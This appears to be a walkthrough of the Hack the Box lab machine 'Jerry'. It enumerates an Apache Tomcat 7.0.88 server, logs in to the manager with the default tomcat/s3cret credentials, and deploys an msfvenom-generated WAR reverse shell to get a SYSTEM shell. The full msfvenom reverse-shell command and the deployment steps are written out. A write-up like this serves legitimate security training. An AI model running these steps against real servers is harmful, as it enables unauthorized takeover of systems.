Summary

Jerry is an easy Windows box that can be exploited by abusing Apache Tomcat's default credentials to reach the Tomcat manager dashboard, from which you can upload .war files. Such a file can be generated with msfvenom and, once deployed, it gives a reverse shell as NT AUTHORITY\SYSTEM, because the Tomcat service itself runs under that account.


Discovery

Nmap discovered the following open ports and services:

nmap -sC -sV -oN fullscan -Pn 10.129.105.253

PORT     STATE SERVICE VERSION
8080/tcp open  http    Apache Tomcat/Coyote JSP engine 1.1
|_http-favicon: Apache Tomcat
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat/7.0.88

Nmap identifies Apache Tomcat 7.0.88 on port 8080. The index.jsp looks as follows:

Gobuster found the following files/dirs:

http://10.129.105.253:8080/index.jsp (Status: 200)
http://10.129.105.253:8080/docs (Status: 302)
http://10.129.105.253:8080/examples (Status: 302)
http://10.129.105.253:8080/manager (Status: 302)

Navigating to the manager URL prompts for HTTP Basic Authentication. If you cancel or enter an incorrect password, Tomcat returns its 401 page:

Credential Discovery

That 401 page embeds an example tomcat-users.xml snippet containing default credentials (Tomcat's example user tomcat with password s3cret). Try these on each of the URLs; they work for http://10.129.105.253:8080/manager/html and log you in to the default Tomcat manager dashboard:


Exploitation

From here you can deploy .war files, which is a very easy way to obtain a reverse shell. A .war file is just a ZIP archive with a fixed layout (a WEB-INF/web.xml descriptor plus the pages and classes to serve); Tomcat unpacks it and compiles and runs any JSP it contains as soon as that page is requested. To generate a .war reverse shell with msfvenom, use the following command (replace IP with your own address):

msfvenom -p java/jsp_shell_reverse_tcp LHOST=IP LPORT=80 -f war > shell.war

Start a listener on the chosen LPORT first (port 80 here), then upload the file through the manager's "WAR file to deploy" form, check that the new application appears in the list, and request its context either with curl or in your browser at:

http://10.129.105.253:8080/shell

Requesting that page makes the JSP connect back, giving a shell as NT AUTHORITY\SYSTEM:

C:\apache-tomcat-7.0.88>whoami
whoami
nt authority\system

This will also give you access to the user and root flags:


Conclusion

This was one of the easiest boxes from Hack the Box in my opinion. Exploiting Apache Tomcat like this is a very common exploitation method so definitely good to know. I hope you learned something from this box and enjoyed the writeup!